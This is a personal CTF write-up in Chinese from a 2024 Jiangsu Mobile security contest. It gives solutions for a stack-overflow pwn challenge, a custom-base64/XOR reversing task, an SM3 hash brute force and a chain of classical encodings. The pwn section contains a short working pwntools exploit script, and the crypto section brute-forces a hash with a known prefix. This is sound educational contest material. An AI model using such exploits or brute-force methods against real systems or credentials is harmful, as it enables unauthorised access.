2024 年江苏移动“赋能建功”网络安全技能竞赛个人 wp

只做了几个题。。。二进制手被薄纱了

pwn

签到

栈溢出,覆盖 s1 为 admin 即可

from pwn import *
# Start the local copy of the challenge binary; the commented-out line below
# is the contest's remote endpoint.
io = process('./p')
#io = remote("172.20.103.5", 43736)
# 16 filler bytes reach s1, then the bytes "admin" end up in s1.
# NOTE(review): presumably the binary reads input into a 16-byte stack buffer
# placed directly before s1 without a length check -- confirm in the
# disassembly. Bounding that read to the buffer size removes the overwrite.
filler = b'A' * 16
payload = b''.join([filler, b'admin'])
io.sendline(payload)
io.interactive()

re

签到

image-20241116095527090

flag{re_1basic_re_12}

eznote

分析源码,输入先后经过了 sub_140001010 和 sub_140001630 两次加密,最后的密文是 byte_140007038

/* Ciphertext as exported from IDA: 32 bytes, the last two of which are 0x00. */
unsigned char byte_140007038[] =
{
0x7A, 0x36, 0x17, 0x3A, 0x34, 0x35, 0x49, 0x40, 0x17, 0x20,
0x49, 0x31, 0x02, 0x2D, 0x02, 0x1C, 0x1E, 0x35, 0x3D, 0x4D,
0x1E, 0x1B, 0x49, 0x2E, 0x0D, 0x2A, 0x3C, 0x2A, 0x4D, 0x2D,
0x00, 0x00
};

分析 sub_140001630

/*
 * XORs the first 29 bytes (indices 0..28) of byte_140007038 in place with 0x78.
 * XOR with a constant is its own inverse, so running the same loop over the
 * stored bytes undoes this step.
 */
__int64 sub_140001630()
{
__int64 result; // rax
int i; // [rsp+0h] [rbp-18h]

for ( i = 0; i < 29; ++i )
{
byte_140007038[i] ^= 0x78u;
result = (unsigned int)(i + 1); // return value is only the loop counter (29 after the last pass)
}
return result;
}

对 byte_140007038 的前 29 个字节逐字节进行 0x78 异或

分析 sub_140001010

/*
 * Base64-style encoder that uses byte_140004400 as its 64-entry alphabet.
 *
 * a1: pointer to the input bytes
 * a2: number of input bytes
 * a3: pointer to the output buffer
 * Returns the number of characters written, not counting the trailing NUL.
 *
 * The function takes no output-size parameter: it writes 4 characters per
 * started 3-byte group plus one NUL, so the caller must size a3 accordingly.
 */
__int64 __fastcall sub_140001010(__int64 a1, unsigned int a2, __int64 a3)
{
unsigned __int8 v4; // [rsp+0h] [rbp-28h]
unsigned __int8 v5; // [rsp+1h] [rbp-27h]
unsigned int v6; // [rsp+4h] [rbp-24h]
unsigned int v7; // [rsp+4h] [rbp-24h]
unsigned int v8; // [rsp+4h] [rbp-24h]
int v9; // [rsp+8h] [rbp-20h]
unsigned int i; // [rsp+Ch] [rbp-1Ch]

// v9: position inside the current 3-byte group (0, 1 or 2)
// v5: previous input byte, v6: output write index
v9 = 0;
v5 = 0;
v6 = 0;
for ( i = 0; i < a2; ++i )
{
v4 = *(_BYTE *)(a1 + i);
if ( v9 )
{
if ( v9 == 1 )
{
// second byte of the group: low 2 bits of the previous byte + high 4 bits of this one
v9 = 2;
*(_BYTE *)(a3 + v6) = byte_140004400[((int)v4 >> 4) & 0xF | (16 * (v5 & 3))];
}
else
{
// third byte of the group: emits two characters and restarts the group
v9 = 0;
*(_BYTE *)(a3 + v6++) = byte_140004400[((int)v4 >> 6) & 3 | (4 * (v5 & 0xF))];
*(_BYTE *)(a3 + v6) = byte_140004400[v4 & 0x3F];
}
++v6;
}
else
{
// first byte of the group: its high 6 bits
v9 = 1;
*(_BYTE *)(a3 + v6++) = byte_140004400[((int)v4 >> 2) & 0x3F];
}
v5 = v4;
}
// tail handling: 61 is '=' (padding)
if ( v9 == 1 )
{
// one leftover byte: one more character, then "=="
*(_BYTE *)(a3 + v6) = byte_140004400[16 * (v5 & 3)];
v7 = v6 + 1;
*(_BYTE *)(a3 + v7++) = 61;
*(_BYTE *)(a3 + v7) = 61;
v6 = v7 + 1;
}
else if ( v9 == 2 )
{
// two leftover bytes: one more character, then "="
*(_BYTE *)(a3 + v6) = byte_140004400[4 * (v5 & 0xF)];
v8 = v6 + 1;
*(_BYTE *)(a3 + v8) = 61;
v6 = v8 + 1;
}
*(_BYTE *)(a3 + v6) = 0; // NUL terminator, not counted in the return value
return v6;
}

以 byte_140004400 为码表进行 base64 编码,其中 byte_140004400 是

/*
 * 64-entry alphabet indexed by sub_140001010.
 * It differs from the standard base64 alphabet at three indices:
 * index 14 holds '0' (0x30) instead of 'O', index 40 holds 'O' (0x4F) instead
 * of 'o', and index 52 holds 'o' (0x6F) instead of '0'. A stock base64
 * decoder therefore gives wrong output for any text containing these characters.
 */
unsigned char byte_140004400[] =
{
0x41, 0x42, 0x43, 0x44, 0x45, 0x46, 0x47, 0x48, 0x49, 0x4A,
0x4B, 0x4C, 0x4D, 0x4E, 0x30, 0x50, 0x51, 0x52, 0x53, 0x54,
0x55, 0x56, 0x57, 0x58, 0x59, 0x5A, 0x61, 0x62, 0x63, 0x64,
0x65, 0x66, 0x67, 0x68, 0x69, 0x6A, 0x6B, 0x6C, 0x6D, 0x6E,
0x4F, 0x70, 0x71, 0x72, 0x73, 0x74, 0x75, 0x76, 0x77, 0x78,
0x79, 0x7A, 0x6F, 0x31, 0x32, 0x33, 0x34, 0x35, 0x36, 0x37,
0x38, 0x39, 0x2B, 0x2F
};

也就是 ABCDEFGHIJKLMN0PQRSTUVWXYZabcdefghijklmnOpqrstuvwxyzo123456789+/(与标准 base64 码表相比,O、o、0 三个字符互换了位置:下标 14 为 0,下标 40 为 O,下标 52 为 o,因此解码时必须使用这张码表)

# Custom base64 alphabet copied from byte_140004400 (64 entries, 8 per row).
ida_chars = [
    0x41, 0x42, 0x43, 0x44, 0x45, 0x46, 0x47, 0x48,
    0x49, 0x4A, 0x4B, 0x4C, 0x4D, 0x4E, 0x30, 0x50,
    0x51, 0x52, 0x53, 0x54, 0x55, 0x56, 0x57, 0x58,
    0x59, 0x5A, 0x61, 0x62, 0x63, 0x64, 0x65, 0x66,
    0x67, 0x68, 0x69, 0x6A, 0x6B, 0x6C, 0x6D, 0x6E,
    0x4F, 0x70, 0x71, 0x72, 0x73, 0x74, 0x75, 0x76,
    0x77, 0x78, 0x79, 0x7A, 0x6F, 0x31, 0x32, 0x33,
    0x34, 0x35, 0x36, 0x37, 0x38, 0x39, 0x2B, 0x2F,
]

# Every value is below 0x80, so a byte-wise decode yields the same text as
# joining chr() of each entry.
encoded_chars = bytes(ida_chars).decode('latin-1')
print(encoded_chars)
# ABCDEFGHIJKLMN0PQRSTUVWXYZabcdefghijklmnOpqrstuvwxyzo123456789+/
#include <stdio.h>
#include <string.h>

/*
 * Reverses the sub_140001630 step: XORs the first 29 ciphertext bytes with
 * 0x78 and prints the buffer as a C string (the two trailing 0x00 bytes
 * terminate it).
 *
 * Reading the output: byte 0 becomes 0x02 (0x7A ^ 0x78), a non-printing
 * control character, and index 29 (0x2D, '-') is outside the loop bound, so
 * it is printed unchanged. The 28 characters in between are the base64 text;
 * decoded with the custom alphabet from byte_140004400 they give the flag body.
 */
int main()
{
    enum { XOR_LEN = 29 };
    unsigned char cipher[] = {
        0x7A, 0x36, 0x17, 0x3A, 0x34, 0x35, 0x49, 0x40,
        0x17, 0x20, 0x49, 0x31, 0x02, 0x2D, 0x02, 0x1C,
        0x1E, 0x35, 0x3D, 0x4D, 0x1E, 0x1B, 0x49, 0x2E,
        0x0D, 0x2A, 0x3C, 0x2A, 0x4D, 0x2D, 0x00, 0x00
    };
    unsigned char *cur = cipher;
    unsigned char *const stop = cipher + XOR_LEN;

    while (cur != stop)
    {
        *cur ^= 0x78u;
        ++cur;
    }

    printf("%s\n", cipher);
    return 0;
}
// NoBLM18oX1IzUzdfME5fc1VuRDR5-

image-20241116102800638

flag{7@K3_4_R3S7_0N_sUnD4y}

Cy

easy-sm

根据已知信息

哈希:f1127f0189ad9e1bde949fb14991db82c9c9b41e90edcf014898595e8ab908c0

前五个字符:admin

明文长度:11

暴力破解:已知前缀 admin 占 5 位,剩余 6 位按数字枚举,逐个计算 SM3 与目标哈希比较

from gmssl import sm3, func
target_hash = "f1127f0189ad9e1bde949fb14991db82c9c9b41e90edcf014898595e8ab908c0"

# Known facts from the challenge: the plaintext is 11 characters long and
# starts with "admin", so 6 characters are unknown. This search treats them as
# a decimal number from 100000 to 999999 (e.g. admin100000, admin100001, ...);
# suffixes with a leading zero or with non-digit characters are not tried.
# A bare, unsalted SM3 digest over so small a space gives no real protection:
# stored secrets need a salt and a deliberately slow KDF.
candidates = (f"admin{suffix}" for suffix in range(100000, 1000000))
found = next(
    (
        guess
        for guess in candidates
        # SM3 digest of the candidate, as a hex string
        if sm3.sm3_hash(func.bytes_to_list(guess.encode())) == target_hash
    ),
    None,
)

if found is None:
    print("no")
else:
    print(f"flag{{{found}}}")

misc

image-20241116123305752

发现是 base62 编码,继续破解

image-20241116123702202

猜测是 rot13

image-20241116123602342

按栅栏密码分两栏解密,结果有 flag 特征

image-20241116123810903

flag{eff05341-9bf6-4e9c-b167-bf7dcb168bc5}